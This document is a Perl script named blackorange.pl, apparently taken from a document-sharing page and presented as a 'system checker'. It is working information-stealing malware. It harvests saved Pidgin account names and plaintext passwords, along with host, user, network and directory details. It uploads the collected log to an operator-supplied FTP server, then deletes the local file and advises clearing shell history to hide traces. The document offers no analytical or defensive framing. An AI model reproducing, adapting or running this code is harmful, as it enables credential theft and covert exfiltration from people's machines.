Vous êtes sur la page 1sur 6

#!

/usr/bin/perl
# blackorange.pl
# Mal
# Not liable should anything happen.
use strict;
use Term::ANSIColor qw/:constants/;
use Net::FTP;
use Sys::Hostname;
use Digest::MD5;
use Config;
use Socket;
use File::Find;
use ExtUtils::Installed;
# Change these to your FTP server
my $ftp_addr = ''; # The IP/address to the FTP
my $ftp_user = ''; # FTP username
my $ftp_pw = ''; # FTP password
my $ftp_destdir = ''; # Destination in FTP, can be left blank for Windows FTP Se
rvers, but not for Linux FTP Servers.
#####################################
my $VER = "0.2";
my $time = scalar(localtime);
my $parent_pid = getppid();
my $child_pid = getpgrp(0);
my $cuser = getlogin();
my $os = $^O;
my $p_ver = $];
my $apt_loc = "/etc/apt/sources.list";
my $hostname = hostname;
my $pidgindir = "/home/$cuser/.purple";
my $arch = $Config{archname};
my $envpath = $ENV{PATH};
my $localip = inet_ntoa( (gethostbyname($hostname))[4]);
my $mode = undef;
if($ARGV[0] =~ /^\-mode\:(\w+)/) {
if($1 eq 'local') {
$mode = 0;
} elsif($1 eq 'ftp') {
$mode = 1;
if( ($ftp_addr eq '') || ($ftp_user eq '') || ($ftp_pw eq '') ||
($ftp_destdir eq '')) {
print BOLD, RED, "Missing FTP information.\n", RESET;
exit;
}
} else {
print BOLD, RED, "Unknown mode.\n", RESET;
exit;
}
} elsif($ARGV[0] eq '-h') {
help();
}else{
print BOLD, BLUE, "Type 'perl blackorange.pl -h'\n", RESET;
exit;
}
system "clear";
print BOLD, BLUE "Black Orange v$VER\n\n", RESET;
open IDLOG, ">>BlackOrangeUpload_$time.txt";
print IDLOG "BLACKORANGEUPLOAD LOG\n\n";
close(IDLOG);
sub help() {
print <<OEF;
NAME
blackorange.pl - system checker
SYNOPSIS
perl blackorange.pl -mode:option
DESCRIPTION
Use this script to log information on a system. This script checks for nume
rous
things such as the basic information of the system (hostname, user, etc) an
d
pidgin passwords stored on the computer. The script also logs the output of
iwconfig and ifconfig, along with the directory-tree of /home.
OPTIONS
local - Saves log to local hard drive
ftp - Uploads log to ftp server
EXAMPLES
perl blackorange.pl -mode:local
perl blackorange.pl -mode:ftp
NOTES
This script works best on Debian-based Linux distributions. For the full lo
gging,
the script looks for /etc/apt/sources.list and logs it (this is found on De
bian-
based distributions).
BUGS
None found during testing.
OEF
exit;
}
sub notremote() {
print BOLD, BLUE, "User chose local.\n", RESET;
exit;
}
sub perlmodules() {
open IDLOG, ">>BlackOrangeUpload_$time.txt";
print IDLOG "\nINSTALLED PERL MODULES (MODULE - VERSION)\n";
print "\nLogging installed Perl Modules.. ";
my $pm = ExtUtils::Installed->new();
foreach my $modules ($pm->modules()) {
my $version = $pm->version($modules);
print IDLOG " $modules - $version\n";
}
close(IDLOG);
}
sub filetree() {
open IDLOG, ">>BlackOrangeUpload_$time.txt";
my $directory = "/home";
print IDLOG "\n\n/HOME/* DIRECTORY TREE LISTING\n";
print "\nLogging '/home/*' Directory Tree.. ";
find sub { print IDLOG " $File::Find::name\n"}, $directory;
print "done.\n";
close(IDLOG);
}
sub networkinfo() {
open IDLOG, ">>BlackOrangeUpload_$time.txt";
print "\nSearching ifconfig.. ";
my $tmpf;
if(-e '/sbin/ifconfig') {
print IDLOG "\n\n/SBIN/IFCONFIG INFORMATION\n";
print BOLD, BLUE, "found.\n", RESET;
my @ethinfof = `/sbin/ifconfig`;
foreach $tmpf (@ethinfof) {
print IDLOG " $tmpf";
}
} else {
print BOLD, RED, "not found.\n", RESET;
}

print "Searching iwconfig.. ";


my $tmpw;
if(-e '/sbin/iwconfig') {
print IDLOG "\n/SBIN/IWCONFIG INFORMATION\n";
print BOLD, BLUE, "found.\n", RESET;
my @ethinfow = `/sbin/iwconfig`;
foreach $tmpw (@ethinfow) {
print IDLOG " $tmpw";
}
} else {
print BOLD, RED, "not found.\n", RESET;
return 0;
}
}
sub aptsources() {
open IDLOG, ">>BlackOrangeUpload_$time.txt";
my $c;
print "\n[Debian-based] Searching APT Sources.. ";
if(-e $apt_loc) {
print BOLD, BLUE, "found.\n", RESET;
open APTMD5, "$apt_loc";
open APT, "$apt_loc";
my $sources = Digest::MD5->new;
$sources->addfile(*APTMD5);
my $md5_sources = $sources->hexdigest;
print IDLOG "\n\nDEBIAN-BASED LINUX: SYSTEM APT SOURCES (MD5:$md
5_sources)\n";
while(<APT>) {
next if /^\s+/;
$c++;
print IDLOG " $_";
}
} else {
print BOLD, RED, "not found.\n", RESET;
return 0;
}
print " - Found $c lines(s)\n";
close(IDLOG);
close(APT);
close(APTMD5);
}
sub ftp() {
open IDLOG, "BlackOrangeUpload_$time.txt";
print "\nFTP Upload..\n";
print " Connecting.. ";
my $ftp = Net::FTP->new("$ftp_addr") or die failed();
print BOLD, BLUE, "success.\n", RESET;
print " Authenticating.. ";
$ftp->login("$ftp_user", "$ftp_pw") or die failed();
print BOLD, BLUE, "success.\n", RESET;
print " Changing working directory.. ";
$ftp->cwd("$ftp_destdir") or die failed();
print BOLD, BLUE, "success.\n", RESET;
print " Uploading.. ";
$ftp->put("BlackOrangeUpload_$time.txt") or die failed();
print BOLD, BLUE, "success.\n", RESET;
print "Killing FTP Connection.\n\n";
$ftp->quit;
close(IDLOG)
}

sub basicinformation() {
open IDLOG, ">>BlackOrangeUpload_$time.txt";
open DISTRO, "/etc/issue";
my $DISTRO;
print "Logging basic system information.. \n";
print IDLOG "BASIC SYSTEM INFORMATION\n";
print IDLOG " - User : $cuser\n";
print IDLOG " - Host : $hostname\n";
print IDLOG " - Local IPv4 : $localip\n";
print IDLOG " - OS : \u$os\n";
while(<DISTRO>) {
if($_ !~ /^\s+/) {
if( ($DISTRO) = $_ =~ /(.*)/) {
$DISTRO = $1;
print IDLOG " - Distribution: $DISTRO\n";
}
}
}
print IDLOG " - Architecture: $arch\n";
print IDLOG " - Perl Version: $p_ver\n";;
print IDLOG " - ScriptPID : $child_pid\n";
print IDLOG " - ScriptParent: $parent_pid\n";
print IDLOG " - ScriptEXEC : $time\n";
print IDLOG " - Env Path : $envpath\n";
close(IDLOG);
return 0;
}
sub pidginaccounts() {
open IDLOG, ">>BlackOrangeUpload_$time.txt";;
print IDLOG "\n\n";
open AXML, "$pidgindir/accounts.xml";
my $axml = Digest::MD5->new;
$axml->addfile(*AXML);
my $md5_xml = $axml->hexdigest;
my ($an,$ac,$ap,$pc,$apr,$prc,$pre);
my (@a, @p, @pr);
my $n = "name";
my $pr = "protocol";
my $pw = "password";
print "\nSearching Pidgin... ";
if(-e "$pidgindir/accounts.xml") {
print BOLD, BLUE, "found.\n", RESET;
} else {
print BOLD, RED, "not found.\n", RESET;
return 0;
}
open ACCT, "$pidgindir/accounts.xml";
print IDLOG "\nPIDGIN INFORMATION (MD5:$md5_xml)\n";
while(<ACCT>) {
s/\s+//g;
if( ($an) = $_ =~ /^<$n>(.*)<\/$n>$/) {
@a = $an;
}elsif( ($pre, $apr) = $_ =~ /^<$pr>(.*)-(.*)<\/$pr>$/) {
@pr = $apr;
}elsif( ($ap) = $_ =~ /^<$pw>(.*)<\/$pw>$/) {
$pc++;
@p = $ap;
print IDLOG " Profile $pc\n";
print IDLOG " Protocol : @pr\n";
print IDLOG " Account : @a\n";
print IDLOG " Password: @p\n";
}
}
print " - Found $pc saved accounts(s)\n";
close(IDLOG);
return 0;
}
sub failed() {
print BOLD, RED, "failed.\n", RESET;
finalize();
}
sub finalize() {
print "Erasing traces..\n";
open IDLOG, ">>BlackOrangeUpload_$time.txt";
print " - Deleted Local Script.\n" if unlink("BlackOrangeUpload_$time.txt"
);
print BOLD, BLUE, " - To erase CLI history, type 'history -c'\n", RESET;
close(IDLOG);
}
## Subroutines in order. Change them around if you know what you're doing. (It'l
l change how it looks in the text output).
basicinformation();
pidginaccounts();
aptsources();
networkinfo();
perlmodules();
filetree();
notremote() if $mode == 0;
ftp() if $mode == 1;
finalize() if $mode == 1;